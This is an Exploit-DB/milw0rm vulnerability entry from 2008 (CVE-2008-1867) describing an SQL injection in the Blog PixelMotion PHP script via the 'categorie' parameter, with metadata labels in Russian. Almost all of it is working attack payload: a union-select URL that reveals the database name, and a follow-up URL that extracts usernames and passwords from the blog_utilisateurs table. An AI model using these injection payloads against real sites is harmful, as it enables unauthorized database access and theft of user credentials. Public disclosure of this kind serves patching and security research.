Exploit Blog PixelMotion - 'categorie' SQL Injection

[Exploiter]

EDB-ID

5382

Проверка EDB

1. Пройдено

Автор

PARAD0X

Тип уязвимости

WEBAPPS

Платформа

PHP

CVE

cve-2008-1867

Дата публикации

2008-04-06

Blog Pixel Motion Sql Injection Vulnerability
-------------------------------------------------------------------------------------------------
# Author  : parad0x
# Home   : www.inso.host.sk
# Script  : Blog PixelMotion 
# Download  : http://www.pixelmotion.org/zip/blog.zip
-------------------------------------------------------------------------------------------------
http://[target]/index.php?categorie=[SQL]

-------------------------------------------------------------------------------------------------
Example:

http://www.xxx.org/blog/index.php?categorie=-1+union+select+0,1,2,database(),4,5,6/*
-------------------------------------------------------------------------------------------------
greetz : VoLqaN
-------------------------------------------------------------------------------------------------

side note (thanks C0D3R-DZ):
http://localhost/[script_path]/index.php?categorie=-1+union+select+1,2,concat(login,0x3a,pass),4,5,6+from+blog_utilisateurs/*

# milw0rm.com [2008-04-06]